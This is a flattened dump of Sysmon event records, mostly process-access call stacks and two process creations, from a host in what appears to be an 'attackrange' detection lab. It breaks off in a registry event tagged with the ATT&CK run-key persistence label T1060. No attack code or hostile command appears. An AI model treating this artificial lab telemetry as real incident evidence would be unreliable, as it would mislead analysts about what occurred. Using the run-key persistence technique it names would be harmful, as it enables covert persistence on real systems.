|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000013329Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:46.788{59A5CD1D-940F-6005-0C05-00000000A301}64766480C:\Program Files\Internet Explorer\iexplore.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+d137d|C:\Windows\System32\SHELL32.dll+d1ac3|C:\Windows\System32\SHELL32.dll+d19f4|C:\Windows\System32\SHELL32.dll+d12a2|C:\Windows\SYSTEM32\IEFRAME.dll+11dd18|C:\Windows\SYSTEM32\IEFRAME.dll+d77d2|C:\Windows\SYSTEM32\IEFRAME.dll+d9f4e|C:\Windows\SYSTEM32\IEFRAME.dll+da7d4|C:\Windows\SYSTEM32\IEFRAME.dll+6851e|C:\Windows\SYSTEM32\IEFRAME.dll+de9b1|C:\Windows\SYSTEM32\IEFRAME.dll+d0abd|C:\Windows\SYSTEM32\IEFRAME.dll+d1939|C:\Windows\SYSTEM32\IEFRAME.dll+d1e22|C:\Windows\SYSTEM32\IEFRAME.dll+ceef8|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\SYSTEM32\iertutil.dll+32b2d 10341000x800000000000000013328Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:46.757{59A5CD1D-8E46-6005-1100-00000000A301}11721848C:\Windows\system32\svchost.exe{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013327Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:46.726{59A5CD1D-8E46-6005-1100-00000000A301}11721848C:\Windows\system32\svchost.exe{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013326Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:46.632{59A5CD1D-9416-6005-1105-00000000A301}68286832C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013325Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:46.476{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9416-6005-1105-00000000A301}6828C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013324Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:46.476{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013323Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:46.476{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013322Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:46.476{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013321Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:46.476{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013320Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:46.476{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9416-6005-1105-00000000A301}6828C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000013319Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:46.476{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9416-6005-1105-00000000A301}6828C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000013318Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:46.336{59A5CD1D-9416-6005-1105-00000000A301}6828C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000013317Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:46.351{59A5CD1D-93FD-6005-FF04-00000000A301}25844116C:\Windows\system32\rundll32.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\shell32.dll+a205e|C:\Windows\System32\shell32.dll+d3fe2|C:\Windows\system32\AppXDeploymentExtensions.OneCore.dll+5d1fe|C:\Windows\system32\rundll32.exe+3b0c|C:\Windows\system32\rundll32.exe+6097|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013316Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:46.351{59A5CD1D-93FD-6005-FF04-00000000A301}25844116C:\Windows\system32\rundll32.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\shell32.dll+a1fc8|C:\Windows\System32\shell32.dll+d3fe2|C:\Windows\system32\AppXDeploymentExtensions.OneCore.dll+5d1fe|C:\Windows\system32\rundll32.exe+3b0c|C:\Windows\system32\rundll32.exe+6097|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013315Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:46.351{59A5CD1D-93FD-6005-FF04-00000000A301}25844116C:\Windows\system32\rundll32.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\shell32.dll+a1faa|C:\Windows\System32\shell32.dll+d3fe2|C:\Windows\system32\AppXDeploymentExtensions.OneCore.dll+5d1fe|C:\Windows\system32\rundll32.exe+3b0c|C:\Windows\system32\rundll32.exe+6097|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013314Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:46.351{59A5CD1D-93FD-6005-FF04-00000000A301}25844116C:\Windows\system32\rundll32.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\shell32.dll+a1faa|C:\Windows\System32\shell32.dll+d3fe2|C:\Windows\system32\AppXDeploymentExtensions.OneCore.dll+5d1fe|C:\Windows\system32\rundll32.exe+3b0c|C:\Windows\system32\rundll32.exe+6097|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013313Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:46.351{59A5CD1D-93FD-6005-FF04-00000000A301}25844116C:\Windows\system32\rundll32.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\shell32.dll+5faba|C:\Windows\System32\shell32.dll+d42b4|C:\Windows\System32\shell32.dll+d3f08|C:\Windows\system32\AppXDeploymentExtensions.OneCore.dll+5d1fe|C:\Windows\system32\rundll32.exe+3b0c|C:\Windows\system32\rundll32.exe+6097|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013312Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:46.351{59A5CD1D-93FD-6005-FF04-00000000A301}25844116C:\Windows\system32\rundll32.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\shell32.dll+5faa8|C:\Windows\System32\shell32.dll+d42b4|C:\Windows\System32\shell32.dll+d3f08|C:\Windows\system32\AppXDeploymentExtensions.OneCore.dll+5d1fe|C:\Windows\system32\rundll32.exe+3b0c|C:\Windows\system32\rundll32.exe+6097|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013311Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:46.351{59A5CD1D-93FD-6005-FF04-00000000A301}25844116C:\Windows\system32\rundll32.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\shell32.dll+5faa8|C:\Windows\System32\shell32.dll+d42b4|C:\Windows\System32\shell32.dll+d3f08|C:\Windows\system32\AppXDeploymentExtensions.OneCore.dll+5d1fe|C:\Windows\system32\rundll32.exe+3b0c|C:\Windows\system32\rundll32.exe+6097|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013310Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:46.164{59A5CD1D-8E46-6005-1100-00000000A301}11721848C:\Windows\system32\svchost.exe{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013395Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:47.898{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9417-6005-1505-00000000A301}6996C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013394Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:47.460{59A5CD1D-9417-6005-1605-00000000A301}70287032C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013393Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:47.382{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013392Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:47.382{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013391Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:47.382{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013390Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:47.382{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013389Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:47.382{59A5CD1D-93F6-6005-E604-00000000A301}48881684C:\Windows\system32\csrss.exe{59A5CD1D-9417-6005-1705-00000000A301}7068C:\Windows\System32\ctfmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000013388Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:47.382{59A5CD1D-93FA-6005-FC04-00000000A301}37846292C:\Windows\Explorer.EXE{59A5CD1D-9417-6005-1705-00000000A301}7068C:\Windows\System32\ctfmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e55f|C:\Windows\System32\windows.storage.dll+16e1d5|C:\Windows\System32\windows.storage.dll+16dcc6|C:\Windows\System32\windows.storage.dll+16f138|C:\Windows\System32\windows.storage.dll+16daee|C:\Windows\System32\windows.storage.dll+fd005|C:\Windows\System32\windows.storage.dll+fd384|C:\Windows\System32\windows.storage.dll+fc9c0|C:\Windows\System32\windows.storage.dll+1663de|C:\Windows\System32\windows.storage.dll+1660d2|C:\Windows\System32\SHELL32.dll+8fe71|C:\Windows\System32\SHELL32.dll+8ecd6|C:\Windows\System32\SHELL32.dll+cfbb1|C:\Windows\System32\SHELL32.dll+b5dbe|C:\Windows\Explorer.EXE+11f63|C:\Windows\Explorer.EXE+11cb7|C:\Windows\Explorer.EXE+11c0c|C:\Windows\Explorer.EXE+11b8a|C:\Windows\Explorer.EXE+1c8ea|C:\Windows\Explorer.EXE+12d17 154100x800000000000000013387Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:47.389{59A5CD1D-9417-6005-1705-00000000A301}7068C:\Windows\System32\ctfmon.exe10.0.14393.0 (rs1_release.160715-1616)CTF LoaderMicrosoft® Windows® Operating SystemMicrosoft CorporationCTFMON.EXE"C:\Windows\System32\ctfmon.exe" /nC:\Windows\system32\ATTACKRANGE\Administrator{59A5CD1D-93F8-6005-49A2-2C0000000000}0x2ca2492HighMD5=BB38581A13B7265CF4E62741955E7457,SHA256=103C028F6ED13FDF916B0B15138BDFE66CAC0D667D735D853FC8E45341FE8A3A,IMPHASH=C799FE056F8DF24A5E47C4D509C9D61C{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\explorer.exeC:\Windows\Explorer.EXE /NOUACCHECK 12241200x800000000000000013386Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localT1060,RunKeyDeleteValue2021-01-18 